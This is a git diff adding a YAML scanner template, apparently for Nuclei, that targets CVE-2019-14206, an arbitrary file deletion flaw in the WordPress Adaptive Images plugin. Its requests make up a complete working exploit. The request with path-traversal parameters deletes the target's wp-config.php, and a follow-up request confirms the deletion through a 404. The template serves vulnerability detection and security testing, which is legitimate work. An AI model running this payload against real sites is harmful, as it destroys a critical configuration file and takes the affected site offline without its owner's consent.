diff --git a/http/cves/2019/CVE-2019-14206.yaml b/http/cves/2019/CVE-2019-14206.yaml new file mode 100644 index 000000000000..9a254ca0cc79 --- /dev/null +++ b/http/cves/2019/CVE-2019-14206.yaml @@ -0,0 +1,60 @@ +id: CVE-2019-14206 + +info: + name: Nevma Adaptive Images < 0.6.67 - Arbitrary File Deletion + author: D3nverNg, thewindghost + severity: High + description: | + Nevma Adaptive Images plugin before 0.6.67 for WordPress allows arbitrary file deletion + via unsanitized input in adaptive-images-script.php. Remote attackers can delete arbitrary + files by sending specially crafted request parameters. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2019-14206 + - https://github.com/markgruffer/markgruffer.github.io/blob/master/_posts/2019-07-19-adaptive-images-for-wordpress-0-6-66-lfi-rce-file-deletion.markdown + - https://wordpress.org/plugins/adaptive-images/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H + cvss-score: 7.5 + cve-id: CVE-2019-14206 + cwe-id: CWE-22 + metadata: + verified: true + max-request: 3 + tags: cve,cve2019,wordpress,wp-plugin,file-deletion,adaptive-images + +requests: + - method: GET + path: + - "{{BaseURL}}/" + + extractors: + - type: regex + name: image_source + part: body + regex: + - '(\/wp-content\/uploads\/[0-9]{4}\/[0-9]{2}\/[a-zA-Z0-9_\-]+\.(?:jpg|jpeg|png))' + group: 1 + internal: true + + - method: GET + path: + - "{{BaseURL}}{{image_source}}?adaptive-images-settings[source_file]=../../../{{image_source}}&adaptive-images-settings[resolution]=&resolution=16000&adaptive-images-settings[wp_content]=.&adaptive-images-settings[cache_dir]=../../..&adaptive-images-settings[request_uri]=wp-config.php&adaptive-images-settings[watch_cache]=1" + + matchers: + - type: status + status: + - 200 + + - method: GET + path: + - "{{BaseURL}}/wp-config.php" + + matchers: + - type: status + status: + - 404 + - type: word + part: body + words: + - "Not Found" + condition: or